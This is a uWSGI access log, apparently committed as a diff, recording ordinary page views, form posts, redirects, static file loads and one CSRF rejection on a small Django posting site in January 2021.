1) +[pid: 661|app: -1|req: -1/2870] 180.160.48.43 () {40 vars in 973 bytes} [Thu Jan 14 12:26:40 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2180/2871] 180.160.48.43 () {40 vars in 924 bytes} [Thu Jan 14 12:26:42 2021] GET /single/12/ => generated 10099 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2181/2872] 180.160.48.43 () {48 vars in 1019 bytes} [Thu Jan 14 12:26:48 2021] POST /single/12/ => generated 27 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2182/2873] 180.160.48.43 () {40 vars in 925 bytes} [Thu Jan 14 12:26:49 2021] GET /single/12/ => generated 9633 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2184/2874] 180.160.48.43 () {50 vars in 1005 bytes} [Thu Jan 14 12:27:19 2021] POST /single/12/ => generated 27 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2185/2875] 180.160.48.43 () {40 vars in 820 bytes} [Thu Jan 14 12:27:19 2021] GET /single/12/ => generated 9119 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[uwsgi-body-read] Error reading 28444 bytes. Content-Length: 3072965 consumed: 2920676 left: 152289 message: Client closed connection +Forbidden (CSRF token missing or incorrect.): /single/15/ +[pid: 661|app: 0|req: 2186/2876] 180.160.63.35 () {48 vars in 1075 bytes} [Thu Jan 14 12:27:15 2021] POST /single/15/ => generated 2513 bytes in 9591 msecs (HTTP/1.1 403) 5 headers in 159 bytes (229 switches on core 0) +[pid: 661|app: 0|req: 2187/2877] 180.160.48.43 () {40 vars in 817 bytes} [Thu Jan 14 12:27:25 2021] GET /all-0-0-0 => generated 13651 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2187/2878] 180.160.63.35 () {48 vars in 1075 bytes} [Thu Jan 14 12:27:20 2021] POST /single/15/ => generated 0 bytes in 8778 msecs (HTTP/1.1 302) 7 headers in 203 bytes (298 switches on core 1) +[pid: 661|app: 0|req: 2188/2879] 180.160.63.35 () {42 vars in 921 bytes} [Thu Jan 14 12:27:29 2021] GET /single/15 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2189/2880] 180.160.63.35 () {42 vars in 923 bytes} [Thu Jan 14 12:27:29 2021] GET /single/15/ => generated 9808 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2881] 180.160.63.35 () {40 vars in 941 bytes} [Thu Jan 14 12:27:29 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2882] 180.160.63.35 () {38 vars in 876 bytes} [Thu Jan 14 12:27:29 2021] GET /static/img/r_photo/6_663C71F7-1851-476D-B6C1-35EEF5FB45BC.jpeg => generated 3072459 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 90 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2190/2883] 180.160.63.35 () {42 vars in 922 bytes} [Thu Jan 14 12:28:22 2021] GET /single/15/ => generated 9808 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2884] 180.160.63.35 () {40 vars in 941 bytes} [Thu Jan 14 12:28:22 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2885] 180.160.63.35 () {40 vars in 931 bytes} [Thu Jan 14 12:28:23 2021] GET /static/img/r_photo/6_663C71F7-1851-476D-B6C1-35EEF5FB45BC.jpeg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2191/2886] 180.160.48.43 () {38 vars in 834 bytes} [Thu Jan 14 12:28:23 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2887] 180.160.63.35 () {42 vars in 849 bytes} [Thu Jan 14 12:28:23 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2888] 180.160.48.43 () {40 vars in 823 bytes} [Thu Jan 14 12:28:23 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2889] 180.160.48.43 () {40 vars in 845 bytes} [Thu Jan 14 12:28:23 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2890] 180.160.48.43 () {40 vars in 827 bytes} [Thu Jan 14 12:28:23 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2891] 180.160.48.43 () {40 vars in 831 bytes} [Thu Jan 14 12:28:23 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2892] 180.160.48.43 () {40 vars in 825 bytes} [Thu Jan 14 12:28:23 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2893] 180.160.48.43 () {40 vars in 806 bytes} [Thu Jan 14 12:28:23 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2894] 180.160.48.43 () {40 vars in 804 bytes} [Thu Jan 14 12:28:23 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2895] 180.160.48.43 () {40 vars in 822 bytes} [Thu Jan 14 12:28:23 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2896] 180.160.48.43 () {40 vars in 820 bytes} [Thu Jan 14 12:28:23 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2897] 180.160.48.43 () {40 vars in 812 bytes} [Thu Jan 14 12:28:24 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2898] 180.160.48.43 () {40 vars in 877 bytes} [Thu Jan 14 12:28:24 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2192/2899] 180.160.63.35 () {40 vars in 882 bytes} [Thu Jan 14 12:28:32 2021] GET /home/ => generated 10083 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2193/2900] 180.160.48.43 () {40 vars in 923 bytes} [Thu Jan 14 12:28:32 2021] GET /all-0-0-0 => generated 13672 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2901] 180.160.48.43 () {40 vars in 899 bytes} [Thu Jan 14 12:28:32 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2902] 180.160.48.43 () {40 vars in 973 bytes} [Thu Jan 14 12:28:32 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2903] 180.160.48.43 () {40 vars in 927 bytes} [Thu Jan 14 12:28:32 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2194/2904] 180.160.48.43 () {40 vars in 936 bytes} [Thu Jan 14 12:28:34 2021] GET /ownpublish-0-0-0 => generated 10043 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2195/2905] 180.160.63.35 () {40 vars in 885 bytes} [Thu Jan 14 12:28:35 2021] GET /all-0-0-0 => generated 13654 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2906] 180.160.63.35 () {40 vars in 866 bytes} [Thu Jan 14 12:28:35 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2907] 180.160.63.35 () {40 vars in 894 bytes} [Thu Jan 14 12:28:35 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2196/2908] 180.160.63.35 () {40 vars in 891 bytes} [Thu Jan 14 12:28:41 2021] GET /single/15/ => generated 9808 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2909] 180.160.63.35 () {40 vars in 931 bytes} [Thu Jan 14 12:28:41 2021] GET /static/img/r_photo/6_663C71F7-1851-476D-B6C1-35EEF5FB45BC.jpeg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2197/2910] 180.160.63.35 () {42 vars in 922 bytes} [Thu Jan 14 12:29:01 2021] GET /single/15/ => generated 9808 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2911] 180.160.63.35 () {40 vars in 931 bytes} [Thu Jan 14 12:29:01 2021] GET /static/img/r_photo/6_663C71F7-1851-476D-B6C1-35EEF5FB45BC.jpeg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2912] 180.160.63.35 () {42 vars in 849 bytes} [Thu Jan 14 12:29:01 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2198/2913] 180.160.63.35 () {40 vars in 882 bytes} [Thu Jan 14 12:29:22 2021] GET /home/ => generated 10083 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2199/2914] 180.160.63.35 () {40 vars in 899 bytes} [Thu Jan 14 12:29:27 2021] GET /home/single.html => generated 10083 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2200/2915] 180.160.63.35 () {40 vars in 894 bytes} [Thu Jan 14 12:29:31 2021] GET /single/2 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2201/2916] 180.160.63.35 () {40 vars in 896 bytes} [Thu Jan 14 12:29:31 2021] GET /single/2/ => generated 9288 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2202/2917] 180.160.48.43 () {40 vars in 817 bytes} [Thu Jan 14 12:30:43 2021] GET /single/12 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2203/2918] 180.160.48.43 () {40 vars in 819 bytes} [Thu Jan 14 12:30:44 2021] GET /single/12/ => generated 9119 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2204/2919] 180.160.48.43 () {46 vars in 959 bytes} [Thu Jan 14 12:30:49 2021] POST /single/12/ => generated 0 bytes in 23 msecs (HTTP/1.1 302) 7 headers in 203 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2205/2920] 180.160.48.43 () {42 vars in 849 bytes} [Thu Jan 14 12:30:50 2021] GET /single/12 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2206/2921] 180.160.48.43 () {42 vars in 851 bytes} [Thu Jan 14 12:30:50 2021] GET /single/12/ => generated 9582 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2207/2922] 180.160.48.43 () {40 vars in 921 bytes} [Thu Jan 14 12:31:17 2021] GET /home/ => generated 10101 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2208/2923] 180.160.63.35 () {42 vars in 930 bytes} [Thu Jan 14 12:32:40 2021] GET /home/single.html => generated 10083 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2924] 180.160.63.35 () {42 vars in 855 bytes} [Thu Jan 14 12:32:40 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2209/2925] 180.160.63.35 () {42 vars in 930 bytes} [Thu Jan 14 12:32:44 2021] GET /home/single.html => generated 10083 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2926] 180.160.63.35 () {42 vars in 855 bytes} [Thu Jan 14 12:32:44 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2210/2927] 180.160.63.35 () {40 vars in 896 bytes} [Thu Jan 14 12:32:48 2021] GET /all-0-0-0 => generated 13654 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2928] 180.160.63.35 () {40 vars in 864 bytes} [Thu Jan 14 12:32:48 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2929] 180.160.63.35 () {40 vars in 894 bytes} [Thu Jan 14 12:32:48 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2930] 180.160.63.35 () {40 vars in 940 bytes} [Thu Jan 14 12:32:48 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2931] 180.160.63.35 () {40 vars in 866 bytes} [Thu Jan 14 12:32:48 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2211/2932] 219.228.146.135 () {42 vars in 976 bytes} [Thu Jan 14 12:32:49 2021] GET /ownpublish-0-0-0 => generated 9822 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2933] 219.228.146.135 () {42 vars in 890 bytes} [Thu Jan 14 12:32:49 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2212/2934] 180.160.63.35 () {40 vars in 891 bytes} [Thu Jan 14 12:32:54 2021] GET /single/12/ => generated 9585 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2213/2935] 180.160.63.35 () {42 vars in 922 bytes} [Thu Jan 14 12:33:00 2021] GET /single/12/ => generated 9585 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2936] 180.160.63.35 () {42 vars in 849 bytes} [Thu Jan 14 12:33:00 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2214/2937] 180.160.63.35 () {40 vars in 891 bytes} [Thu Jan 14 12:33:09 2021] GET /single/15/ => generated 9808 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2938] 180.160.63.35 () {40 vars in 931 bytes} [Thu Jan 14 12:33:09 2021] GET /static/img/r_photo/6_663C71F7-1851-476D-B6C1-35EEF5FB45BC.jpeg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2215/2939] 180.160.63.35 () {40 vars in 890 bytes} [Thu Jan 14 12:33:50 2021] GET /single/13/ => generated 9178 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2216/2940] 180.160.63.35 () {40 vars in 886 bytes} [Thu Jan 14 12:33:58 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2217/2941] 180.160.63.35 () {40 vars in 888 bytes} [Thu Jan 14 12:33:58 2021] GET /single/4/ => generated 9166 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2218/2942] 180.160.63.35 () {40 vars in 887 bytes} [Thu Jan 14 12:34:06 2021] GET /single/6 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2219/2943] 180.160.63.35 () {40 vars in 889 bytes} [Thu Jan 14 12:34:06 2021] GET /single/6/ => generated 9171 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2220/2944] 219.228.146.135 () {42 vars in 976 bytes} [Thu Jan 14 12:34:20 2021] GET /ownpublish-0-0-0 => generated 9822 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2945] 219.228.146.135 () {42 vars in 890 bytes} [Thu Jan 14 12:34:20 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2221/2946] 219.228.146.135 () {40 vars in 931 bytes} [Thu Jan 14 12:34:23 2021] GET /all-0-0-0 => generated 13652 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2947] 219.228.146.135 () {40 vars in 897 bytes} [Thu Jan 14 12:34:24 2021] GET /static/img/t_photo/wrong.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2948] 219.228.146.135 () {40 vars in 905 bytes} [Thu Jan 14 12:34:24 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2949] 219.228.146.135 () {38 vars in 874 bytes} [Thu Jan 14 12:34:24 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 215061 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2950] 219.228.146.135 () {40 vars in 901 bytes} [Thu Jan 14 12:34:24 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2951] 219.228.146.135 () {40 vars in 899 bytes} [Thu Jan 14 12:34:24 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2952] 219.228.146.135 () {38 vars in 920 bytes} [Thu Jan 14 12:34:24 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 168198 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2953] 219.228.146.135 () {40 vars in 914 bytes} [Thu Jan 14 12:34:27 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2222/2954] 219.228.146.135 () {40 vars in 922 bytes} [Thu Jan 14 12:34:30 2021] GET /single/1 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2223/2955] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 12:34:30 2021] GET /single/1/ => generated 9428 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2224/2956] 219.228.146.135 () {42 vars in 955 bytes} [Thu Jan 14 12:34:37 2021] GET /single/1/ => generated 9428 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2957] 219.228.146.135 () {42 vars in 883 bytes} [Thu Jan 14 12:34:37 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2225/2958] 180.160.63.35 () {42 vars in 927 bytes} [Thu Jan 14 12:36:21 2021] GET /all-0-0-0 => generated 13654 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2959] 180.160.63.35 () {40 vars in 894 bytes} [Thu Jan 14 12:36:21 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2960] 180.160.63.35 () {40 vars in 940 bytes} [Thu Jan 14 12:36:21 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2961] 180.160.63.35 () {42 vars in 848 bytes} [Thu Jan 14 12:36:21 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2226/2962] 180.160.63.35 () {40 vars in 891 bytes} [Thu Jan 14 12:36:25 2021] GET /single/15/ => generated 10051 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2963] 180.160.63.35 () {40 vars in 931 bytes} [Thu Jan 14 12:36:25 2021] GET /static/img/r_photo/6_663C71F7-1851-476D-B6C1-35EEF5FB45BC.jpeg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2227/2964] 219.228.146.135 () {42 vars in 954 bytes} [Thu Jan 14 12:37:19 2021] GET /single/1/ => generated 9413 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2965] 219.228.146.135 () {40 vars in 850 bytes} [Thu Jan 14 12:37:19 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2966] 219.228.146.135 () {40 vars in 848 bytes} [Thu Jan 14 12:37:19 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2967] 219.228.146.135 () {40 vars in 866 bytes} [Thu Jan 14 12:37:19 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2968] 219.228.146.135 () {40 vars in 856 bytes} [Thu Jan 14 12:37:19 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2969] 219.228.146.135 () {42 vars in 882 bytes} [Thu Jan 14 12:37:19 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2228/2970] 180.160.48.43 () {40 vars in 917 bytes} [Thu Jan 14 12:37:58 2021] GET /all-0-0-0 => generated 13672 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2971] 180.160.48.43 () {40 vars in 896 bytes} [Thu Jan 14 12:37:58 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2972] 180.160.48.43 () {40 vars in 898 bytes} [Thu Jan 14 12:37:59 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2973] 180.160.48.43 () {40 vars in 926 bytes} [Thu Jan 14 12:37:59 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2974] 180.160.48.43 () {40 vars in 972 bytes} [Thu Jan 14 12:37:59 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +Not Found: / +[pid: 661|app: 0|req: 2229/2975] 83.97.20.25 () {26 vars in 279 bytes} [Thu Jan 14 12:41:09 2021] GET / => generated 3429 bytes in 9 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: / +[pid: 661|app: 0|req: 2230/2976] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 12:45:52 2021] GET / => generated 3429 bytes in 6 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2231/2977] 180.160.48.43 () {40 vars in 923 bytes} [Thu Jan 14 12:46:52 2021] GET /single/13/ => generated 9424 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2978] 180.160.48.43 () {40 vars in 866 bytes} [Thu Jan 14 12:46:52 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2979] 180.160.48.43 () {40 vars in 870 bytes} [Thu Jan 14 12:46:52 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2980] 180.160.48.43 () {40 vars in 888 bytes} [Thu Jan 14 12:46:52 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2981] 180.160.48.43 () {40 vars in 874 bytes} [Thu Jan 14 12:46:52 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 